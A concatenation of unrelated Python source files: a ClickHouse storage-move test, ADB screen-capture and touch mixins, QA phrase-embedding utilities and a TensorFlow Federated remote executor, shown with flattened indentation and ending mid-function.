node1.query("OPTIMIZE TABLE {} FINAL".format(name))
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
# Fill jbod1 to force ClickHouse to make move of partition 1 to external.
node1.query("INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
# If SELECT locked old part on external, move shall fail.
assert node1.query("SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
mixins.py
|
# -*- coding: utf-8 -*-
# minin classes.
# use extra resource to enhance original adb device.
# interface class should have raw_cmd method with a signature
# as follows:
#
# def raw_cmd(self, *args, **kwargs):
# ...
# return subprocess.Popen(...)
#
# where `args` is adb command arguments and kwargs are
# subprocess keyword arguments.
import os
import Queue
import re
import socket
import struct
import subprocess
import threading
import time
import traceback
__dir__ = os.path.dirname(os.path.abspath(__file__))
class RotationWatcherMixin(object):
__rotation = 0
__watcher_process = None
def open_rotation_watcher(self, on_rotation_change=None):
package_name = 'jp.co.cyberagent.stf.rotationwatcher'
out = self.raw_cmd('shell', 'pm', 'list', 'packages', stdout=subprocess.PIPE).communicate()[0]
if package_name not in out:
apkpath = os.path.join(__dir__, '..', 'vendor', 'RotationWatcher.apk')
print 'install rotationwatcher...', apkpath
if 0 != self.raw_cmd('install', '-rt', apkpath).wait():
print 'install rotationwatcher failed.'
return
if self.__watcher_process is not None:
self.__watcher_process.kill()
out = self.raw_cmd('shell', 'pm', 'path', package_name, stdout=subprocess.PIPE).communicate()[0]
path = out.strip().split(':')[-1]
p = self.raw_cmd('shell',
'CLASSPATH="%s"' % path,
'app_process',
'/system/bin',
'jp.co.cyberagent.stf.rotationwatcher.RotationWatcher',
stdout=subprocess.PIPE)
self.__watcher_process = p
queue = Queue.Queue()
def _pull():
while True:
line = p.stdout.readline().strip()
if not line:
if p.poll() is not None:
print 'rotationwatcher stopped'
break
continue
queue.put(line)
t = threading.Thread(target=_pull)
t.setDaemon(True)
t.start()
def listener(value):
try:
self.__rotation = int(value)/90
except:
return
if callable(on_rotation_change):
on_rotation_change(self.__rotation)
def _listen():
while True:
try:
time.sleep(0.005)
line = queue.get_nowait()
listener(line)
except Queue.Empty:
if p.poll() is not None:
break
continue
except:
traceback.print_exc()
t = threading.Thread(target=_listen)
t.setDaemon(True)
t.start()
def str2img(jpgstr, orientation=None):
import numpy as np
import cv2
arr = np.fromstring(jpgstr, np.uint8)
img = cv2.imdecode(arr, cv2.IMREAD_COLOR)
if orientation == 1:
return cv2.flip(cv2.transpose(img), 0) # counter-clockwise
if orientation == 3:
return cv2.flip(cv2.transpose(img), 1) # clockwise
return img
class MinicapStreamMixin(object):
__screen = None
__minicap_process = None
def __install_minicap(self):
# install minicap & minitouch
os.system('python -m atx minicap')
def open_minicap_stream(self, port=1313):
# ensure minicap installed
out = self.raw_cmd('shell', 'ls', '"/data/local/tmp/minicap"', stdout=subprocess.PIPE).communicate()[0]
if 'No such file or directory' in out:
self.__install_minicap()
if self.__minicap_process is not None:
self.__minicap_process.kill()
# if minicap is already started, kill it first.
out = self.raw_cmd('shell', 'ps', '-C', '/data/local/tmp/minicap', stdout=subprocess.PIPE).communicate()[0]
out = out.strip().split('\n')
if len(out) > 1:
idx = out[0].split().index('PID')
pid = out[1].split()[idx]
print 'minicap is running, killing', pid
self.raw_cmd('shell', 'kill', '-9', pid).wait()
# start minicap
out = self.raw_cmd('shell', 'LD_LIBRARY_PATH=/data/local/tmp', '/data/local/tmp/minicap', '-i',
stdout=subprocess.PIPE).communicate()[0]
m = re.search('"width": (\d+).*"height": (\d+).*"rotation": (\d+)', out, re.S)
w, h, r = map(int, m.groups())
w, h = min(w, h), max(w, h)
params = '{x}x{y}@{x}x{y}/{r}'.format(x=w, y=h, r=r)
print 'starting minicap', params
p = self.raw_cmd('shell',
'LD_LIBRARY_PATH=/data/local/tmp',
'/data/local/tmp/minicap',
'-P %s' % params,
'-S',
stdout=subprocess.PIPE)
self.__minicap_process = p
time.sleep(0.5)
# forward to tcp port
self.raw_cmd('forward', 'tcp:%s' % port, 'localabstract:minicap').wait()
queue = Queue.Queue()
# pull data from socket
def _pull():
# print 'start pull', p.pid, p.poll()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
assert p.poll() is None
s.connect(('127.0.0.1', port))
t = s.recv(24)
print 'minicap connected', struct.unpack('<2B5I2B', t)
while True:
frame_size = struct.unpack("<I", s.recv(4))[0]
trunks = []
recvd_size = 0
while recvd_size < frame_size:
trunk_size = min(8192, frame_size-recvd_size)
d = s.recv(trunk_size)
trunks.append(d)
recvd_size += len(d)
queue.put(''.join(trunks))
except Exception as e:
if not isinstance(e, struct.error):
traceback.print_exc()
if p.poll() is not None:
print 'Process died.'
print p.stdout.read()
else:
print 'stoping minicap ...'
p.kill()
finally:
s.close()
self.raw_cmd('forward', '--remove', 'tcp:%s' % port).wait()
t = threading.Thread(target=_pull)
t.setDaemon(True)
t.start()
out = self.raw_cmd('shell', 'getprop', 'ro.build.version.sdk', stdout=subprocess.PIPE).communicate()[0]
sdk = int(out.strip())
orientation = r/90
def _listen():
while True:
try:
time.sleep(0.005)
frame = queue.get_nowait()
if sdk <= 16:
img = str2img(frame, orientation)
else:
img = str2img(frame)
self.__screen = img
except Queue.Empty:
if p.poll() is not None:
print 'minicap died'
print p.stdout.read()
break
continue
except:
traceback.print_exc()
t = threading.Thread(target=_listen)
t.setDaemon(True)
t.start()
def screenshot_cv2(self):
return self.__screen
class MinitouchStreamMixin(object):
__touch_queue = None
__minitouch_process = None
def __install_minitouch(self):
# install minicap & minitouch
os.system('python -m atx minicap')
def open_minitouch_stream(self, port=1111):
if self.__touch_queue is None:
self.__touch_queue = Queue.Queue()
# ensure minicap installed
out = self.raw_cmd('shell', 'ls', '"/data/local/tmp/minitouch"', stdout=subprocess.PIPE).communicate()[0]
if 'No such file or directory' in out:
self.__install_minitouch()
if self.__minitouch_process is not None:
self.__minitouch_process.kill()
out = self.raw_cmd('shell', 'ps', '-C', '/data/local/tmp/minitouch', stdout=subprocess.PIPE).communicate()[0]
out = out.strip().split('\n')
if len(out) > 1:
p = None
else:
p = self.raw_cmd('shell', '/data/local/tmp/minitouch')
time.sleep(1)
if p.poll() is not None:
print 'start minitouch failed.'
return
self.__minitouch_process = p
self.raw_cmd('forward', 'tcp:%s' % port, 'localabstract:minitouch').wait()
def send():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.connect(('127.0.0.1', port))
while True:
cmd = self.__touch_queue.get() # wait here
if not cmd:
continue
elif cmd[-1] != '\n':
cmd += '\n'
s.send(cmd)
except:
traceback.print_exc()
finally:
s.close()
self.raw_cmd('forward', '--remove', 'tcp:%s' % port).wait()
t = threading.Thread(target=send)
t.setDaemon(True)
t.start()
def click(self, x, y):
cmd = 'd 0 %d %d 30\nc\nu 0\nc\n' % (int(x), int(y))
self.__touch_queue.put(cmd)
def swipe(self, sx, sy, ex, ey, steps=20):
x1, y1, x2, y2 = map(int, (x1, y1, x2, y2))
dx = (x2-x1)/steps
dy = (y2-y1)/steps
send = self.touchqueue.put
send('d 0 %d %d 30\nc\n' % (x1, y1))
for i in range(steps-1):
x, y = x1+(i+1)*dx, y1+(i+1)*dy
send('m 0 %d %d 30\nc\n' % (x, y))
send('u 0 %d %d 30\nc\nu 0\nc\n' % (x2, y2))
def pinchin(self, x1, y1, x2, y2, steps=10):
pass
def pinchout(self, x1, y1, x2, y2, steps=10):
pass
class OpenSTFServiceMixin(object):
pass
#-------------- examples ----------------#
class DummyDevice(object):
def raw_cmd(self, *args, **kwargs):
cmds = ['adb'] + list(args)
print cmds
return subprocess.Popen(cmds, **kwargs)
# Mixins should come in front to override functions in Base
class TestDevice(MinitouchStreamMixin, MinicapStreamMixin, RotationWatcherMixin, DummyDevice):
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.open_rotation_watcher(on_rotation_change=lambda v: self.open_minicap_stream())
self.open_minitouch_stream()
if __name__ == '__main__':
import cv2
dev = TestDevice()
while True:
img = dev.screenshot_cv2()
if img is not None:
cv2.imshow('screen', img)
cv2.waitKey(10)
|
embed_utils.py
|
""" Very heavily inspired by the official evaluation script for SQuAD version 2.0 which was
modified by XLNet authors to update `find_best_threshold` scripts for SQuAD V2.0
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question ID's to the model's predicted probability
that a question is unanswerable.
"""
import collections
import json
import logging
import math
import re
import string
import tqdm
import h5py
import numpy as np
import torch
from multiprocessing import Queue, Process
from threading import Thread
from time import time
from tqdm import tqdm
from transformers.tokenization_bert import BasicTokenizer
from .squad_utils import QuestionResult, SquadResult
from .squad_metrics import get_final_text_
logger = logging.getLogger(__name__)
# For debugging
quant_stat = {}
b_quant_stat = {}
id2example = None
def get_metadata(features, results, max_answer_length, do_lower_case, tokenizer, verbose_logging, has_title):
global id2example
# Get rid of titles + save start only (as start and end are shared)
roberta_add = 1 if "roberta" in str(type(tokenizer)) else 0
toffs = [(f.input_ids.index(tokenizer.sep_token_id))*int(has_title) + roberta_add for f in features]
# Filter reps
fs = np.concatenate(
[result.sft_logits[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)], axis=0
)
fe = np.concatenate(
[result.eft_logits[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)], axis=0
)
if max_answer_length is None:
example = id2example[features[-1].unique_id]
metadata = {
'did': example.doc_idx, 'title': example.title,
'filter_start': fs, 'filter_end': fe
}
return metadata
# start vectors
start = np.concatenate(
[result.start_vecs[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)],
axis=0
)
len_per_para = [len(f.input_ids[to+1:len(f.tokens)-1]) for to, f in zip(toffs, features)]
curr_size = 0
# Start2end map
start2end = -1 * np.ones([np.shape(start)[0], max_answer_length], dtype=np.int32)
idx = 0
for feature, result, to in zip(features, results, toffs):
for i in range(to+1, len(feature.tokens) - 1):
for j in range(i, min(i + max_answer_length, len(feature.tokens) - 1)):
start2end[idx, j - i] = idx + j - i
idx += 1
word2char_start = np.zeros([start.shape[0]], dtype=np.int32)
word2char_end = np.zeros([start.shape[0]], dtype=np.int32)
# Orig map
sep = ' [PAR] '
full_text = ""
prev_example = None
word_pos = 0
for feature, to in zip(features, toffs):
example = id2example[feature.unique_id]
if prev_example is not None and feature.span_idx == 0:
full_text = full_text + ' '.join(prev_example.doc_tokens) + sep
for i in range(to+1, len(feature.tokens) - 1):
_, start_pos, _ = get_final_text_(example, feature, i, min(len(feature.tokens) - 2, i + 1), do_lower_case,
tokenizer, verbose_logging)
_, _, end_pos = get_final_text_(example, feature, max(to+1, i - 1), i, do_lower_case,
tokenizer, verbose_logging)
start_pos += len(full_text)
end_pos += len(full_text)
word2char_start[word_pos] = start_pos
word2char_end[word_pos] = end_pos
word_pos += 1
prev_example = example
full_text = full_text + ' '.join(prev_example.doc_tokens)
metadata = {
'did': prev_example.doc_idx, 'context': full_text, 'title': prev_example.title,
'start': start, 'start2end': start2end,
'word2char_start': word2char_start, 'word2char_end': word2char_end,
'filter_start': fs, 'filter_end': fe, 'len_per_para': len_per_para
}
return metadata
def filter_metadata(metadata, threshold):
start_idxs, = np.where(metadata['filter_start'] > threshold)
end_idxs, = np.where(metadata['filter_end'] > threshold)
all_idxs = np.array(sorted(list(set(np.concatenate([start_idxs, end_idxs])))))
end_long2short = {long: short for short, long in enumerate(all_idxs) if long in end_idxs} # fixed for end_idx
# print(all_idxs)
# print(end_long2short)
if len(all_idxs) == 0:
all_idxs = np.where(metadata['filter_start'] > -999999)[0][:1] # just get all
end_long2short = {long: short for short, long in enumerate(all_idxs)}
print('all idxs were filtered, so use only one vector for this:', len(all_idxs))
metadata['start'] = metadata['start'][all_idxs] # union of start/end
metadata['f2o_start'] = all_idxs
metadata['start2end'] = metadata['start2end'][all_idxs]
# print(metadata['start2end'])
for i, each in enumerate(metadata['start2end']):
for j, long in enumerate(each.tolist()):
metadata['start2end'][i, j] = end_long2short[long] if long in end_long2short else -1
# print(metadata['start2end'])
return metadata
def float_to_int8(num, offset, factor):
out = (num - offset) * factor
out = out.clip(-128, 127)
out = np.round(out).astype(np.int8)
return out
def int8_to_float(num, offset, factor):
return num.astype(np.float32) / factor + offset
def float_to_int4(num, offset=-3.5, factor=2.3):
out = (num - offset) * factor
out = out.clip(0, 16)
out = np.round(out).astype(np.uint8)
hd = out.shape[1] // 2
merged = out[:,:hd] * 16 + out[:,hd:]
merged = merged.clip(0, 255)
return merged
def int4_to_float(num, offset=-3.5, factor=2.3):
unmerged = np.concatenate((num // 16, num % 16), axis=1)
return unmerged.astype(np.float32) / factor + offset
def compress_metadata(metadata, dense_offset, dense_scale):
for key in ['start']:
if key in metadata:
'''
if key == 'start':
for meta in metadata[key]:
for number in meta:
num_str = "%.1f" % number
if float(num_str) not in b_quant_stat:
b_quant_stat[float(num_str)] = 0
b_quant_stat[float(num_str)] += 1
'''
metadata[key] = float_to_int8(metadata[key], dense_offset, dense_scale)
# metadata[key] = float_to_int4(metadata[key])
'''
if key == 'start':
for meta in metadata[key]:
for number in meta:
num_str = "%d" % number
if int(num_str) not in quant_stat:
quant_stat[int(num_str)] = 0
quant_stat[int(num_str)] += 1
'''
return metadata
def pool_func(item):
metadata_ = get_metadata(*item[:-1])
if 'start' in metadata_:
metadata_ = filter_metadata(metadata_, item[-1])
return metadata_
def write_phrases(all_examples, all_features, all_results, max_answer_length, do_lower_case, tokenizer, hdf5_path,
filter_threshold, verbose_logging, dense_offset=None, dense_scale=None, has_title=False):
assert len(all_examples) > 0
id2feature = {feature.unique_id: feature for feature in all_features}
id2example_ = {id_: all_examples[id2feature[id_].example_index] for id_ in id2feature}
def add(inqueue_, outqueue_):
for item in iter(inqueue_.get, None):
# start_time = time()
args = list(item[:2]) + [
max_answer_length, do_lower_case, tokenizer, verbose_logging, has_title, filter_threshold
]
out = pool_func(args)
# print(f'in {time() - start_time:.1f} sec, {inqueue_.qsize()}')
outqueue_.put(out)
outqueue_.put(None)
def write(outqueue_):
with h5py.File(hdf5_path, 'a') as f:
while True:
metadata = outqueue_.get()
if metadata:
# start_time = time()
did = str(metadata['did'])
if did in f:
logger.info('%s exists; replacing' % did)
del f[did]
# logger.info('%s exists; skipping' % did)
# continue
dg = f.create_group(did)
dg.attrs['context'] = metadata['context']
dg.attrs['title'] = metadata['title']
if dense_offset is not None:
metadata = compress_metadata(metadata, dense_offset, dense_scale)
dg.attrs['offset'] = dense_offset
dg.attrs['scale'] = dense_scale
dg.create_dataset('start', data=metadata['start'])
dg.create_dataset('len_per_para', data=metadata['len_per_para'])
dg.create_dataset('start2end', data=metadata['start2end'])
dg.create_dataset('word2char_start', data=metadata['word2char_start'])
dg.create_dataset('word2char_end', data=metadata['word2char_end'])
dg.create_dataset('f2o_start', data=metadata['f2o_start'])
# print(f'out {time() - start_time:.1f} sec, {outqueue_.qsize()} ')
else:
break
features = []
results = []
inqueue = Queue(maxsize=50)
outqueue = Queue(maxsize=50)
NUM_THREAD = 10
in_p_list = [Process(target=add, args=(inqueue, outqueue)) for _ in range(NUM_THREAD)]
out_p_list = [Thread(target=write, args=(outqueue,)) for _ in range(NUM_THREAD)]
global id2example
id2example = id2example_
for in_p in in_p_list:
in_p.start()
for out_p in out_p_list:
out_p.start()
start_time = time()
for count, result in enumerate(tqdm(all_results, total=len(all_features))):
example = id2example[result.unique_id]
feature = id2feature[result.unique_id]
condition = len(features) > 0 and example.par_idx == 0 and feature.span_idx == 0
if condition:
in_ = (features, results)
inqueue.put(in_)
prev_ex = id2example[results[0].unique_id]
if prev_ex.doc_idx % 200 == 0:
logger.info(f'saving {len(features)} features from doc {prev_ex.title} (doc_idx: {prev_ex.doc_idx})')
logger.info(
'[%d/%d at %.1f second] ' % (count + 1, len(all_features), time() - start_time) +
'[inqueue, outqueue size: %d vs %d]' % (inqueue.qsize(), outqueue.qsize())
)
features = [feature]
results = [result]
else:
features.append(feature)
results.append(result)
in_ = (features, results)
inqueue.put(in_)
for _ in range(NUM_THREAD):
inqueue.put(None)
for in_p in in_p_list:
in_p.join()
for out_p in out_p_list:
out_p.join()
b_stats = collections.OrderedDict(sorted(b_quant_stat.items()))
stats = collections.OrderedDict(sorted(quant_stat.items()))
for k, v in b_stats.items():
print(k, v)
for k, v in stats.items():
print(k, v)
def write_filter(all_examples, all_features, all_results, tokenizer, hdf5_path, filter_threshold, verbose_logging, has_title=False):
assert len(all_examples) > 0
id2feature = {feature.unique_id: feature for feature in all_features}
id2example_ = {id_: all_examples[id2feature[id_].example_index] for id_ in id2feature}
def add(inqueue_, outqueue_):
for item in iter(inqueue_.get, None):
args = list(item[:2]) + [
None, None, tokenizer, verbose_logging, has_title, filter_threshold
]
out = pool_func(args)
outqueue_.put(out)
outqueue_.put(None)
def write(outqueue_):
with h5py.File(hdf5_path, 'a') as f:
while True:
metadata = outqueue_.get()
if metadata:
did = str(metadata['did'])
if did in f:
logger.info('%s exists; replacing' % did)
del f[did]
dg = f.create_group(did)
dg.attrs['title'] = metadata['title']
dg.create_dataset('filter_start', data=metadata['filter_start'])
dg.create_dataset('filter_end', data=metadata['filter_end'])
else:
break
features = []
results = []
inqueue = Queue(maxsize=50)
outqueue = Queue(maxsize=50)
NUM_THREAD = 10
in_p_list = [Process(target=add, args=(inqueue, outqueue)) for _ in range(NUM_THREAD)]
out_p_list = [Thread(target=write, args=(outqueue,)) for _ in range(NUM_THREAD)]
global id2example
id2example = id2example_
for in_p in in_p_list:
in_p.start()
for out_p in out_p_list:
out_p.start()
start_time = time()
for count, result in enumerate(tqdm(all_results, total=len(all_features))):
example = id2example[result.unique_id]
feature = id2feature[result.unique_id]
condition = len(features) > 0 and example.par_idx == 0 and feature.span_idx == 0
if condition:
# print('put')
# in_ = (id2example_, features, results)
in_ = (features, results)
inqueue.put(in_)
# import pdb; pdb.set_trace()
prev_ex = id2example[results[0].unique_id]
if prev_ex.doc_idx % 200 == 0:
logger.info(f'saving {len(features)} features from doc {prev_ex.title} (doc_idx: {prev_ex.doc_idx})')
logger.info(
'[%d/%d at %.1f second] ' % (count + 1, len(all_features), time() - start_time) +
'[inqueue, outqueue size: %d vs %d]' % (inqueue.qsize(), outqueue.qsize())
)
features = [feature]
results = [result]
else:
features.append(feature)
results.append(result)
in_ = (features, results)
inqueue.put(in_)
for _ in range(NUM_THREAD):
inqueue.put(None)
for in_p in in_p_list:
in_p.join()
for out_p in out_p_list:
out_p.join()
def get_question_results(question_examples, query_eval_features, question_dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in query_eval_features}
id2example = {id_: question_examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
for batch in tqdm(question_dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
assert len(batch) == 4
with torch.no_grad():
inputs = {
"input_ids_": batch[0],
"attention_mask_": batch[1],
"token_type_ids_": batch[2],
"return_query": True,
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
# feature_indices.unsqueeze_(0)
outputs = model(**inputs)
for i, feature_index in enumerate(feature_indices):
eval_feature = query_eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [
to_numpy(output[i]) if type(output) != dict else {k: to_numpy(v[i]) for k, v in output.items()}
for output in outputs
]
if len(output) != 2:
raise NotImplementedError
else:
start_vec, end_vec = output
result = QuestionResult(
unique_id,
qas_id=id2example[unique_id].qas_id,
input_ids=id2feature[unique_id].input_ids_,
start_vec=start_vec,
end_vec=end_vec,
)
yield result
def get_cq_results(examples, eval_features, dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in eval_features}
id2example = {id_: examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
def to_list(tensor):
return tensor.detach().cpu().tolist()
for batch in tqdm(dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = {
"input_ids": batch[0],
"attention_mask": batch[1],
"token_type_ids": batch[2],
"input_ids_": batch[6],
"attention_mask_": batch[7],
"token_type_ids_": batch[8],
"title_offset": batch[9],
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
outputs = model(**inputs)
for i, feature_index in enumerate(feature_indices):
eval_feature = eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [to_list(output[i]) for output in outputs]
if len(output) != 4:
raise NotImplementedError
else:
start_logits, end_logits, sft_logits, eft_logits = output
result = SquadResult(
unique_id,
start_logits=start_logits,
end_logits=end_logits,
sft_logits=sft_logits,
eft_logits=eft_logits,
)
yield result
def get_bertqa_results(examples, eval_features, dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in eval_features}
id2example = {id_: examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
def to_list(tensor):
return tensor.detach().cpu().tolist()
for batch in tqdm(dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = {
"input_ids": batch[0],
"attention_mask": batch[1],
"token_type_ids": batch[2],
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
outputs = model[0](**inputs)
outputs = model[1](outputs[0]).split(dim=2, split_size=1)
for i, feature_index in enumerate(feature_indices):
eval_feature = eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [to_list(output[i].squeeze(1)) for output in outputs]
if len(output) != 2:
raise NotImplementedError
else:
start_logits, end_logits = output
result = SquadResult(
unique_id,
start_logits=start_logits,
end_logits=end_logits,
sft_logits=start_logits,
eft_logits=end_logits,
)
yield result
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_serialization
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_lock = threading.Lock()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
self._stream_error = None
self._request_num = 0
self._request_num_lock = threading.Lock()
def request_iter():
"""Iterator that blocks on the request Queue."""
request = self._request_queue.get()
while request is not None:
yield request
request = self._request_queue.get()
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
if response.WhichOneof('response') is None:
# TODO(b/175927125): We currently pass an empty response in some
# error cases and pass a GRPC error back via the ServicerContext in
# some others. Unify this error-passing.
raise execution_context.RetryableError(
'Unknown error on the service side.')
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except Exception as error: # pylint: disable=broad-except
logging.exception('Error calling remote executor: %s', error)
if _is_retryable_grpc_error(error):
logging.exception('gRPC error is retryable')
error = execution_context.RetryableError(error)
with self._response_event_lock:
self._stream_error = error
for _, response_event in self._response_event_dict.items():
if not response_event.isSet():
response_event.response = error
response_event.set()
self._stream_closed_event.set()
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
py_typecheck.check_type(response_event, threading.Event)
with self._request_num_lock:
seq = self._request_num
self._request_num += 1
with self._response_event_lock:
if self._stream_error is not None:
logging.debug('Stream failed before msg enqueued')
logging.debug('%s', self._stream_error)
response_event.response = self._stream_error
response_event.set()
else:
request.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
request.WhichOneof('request'), seq)
self._response_event_dict[seq] = response_event
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put(request)
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
@tracing.trace(span=True)
def _request(rpc_func, request):
"""Populates trace context and reraises gRPC errors with retryable info."""
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
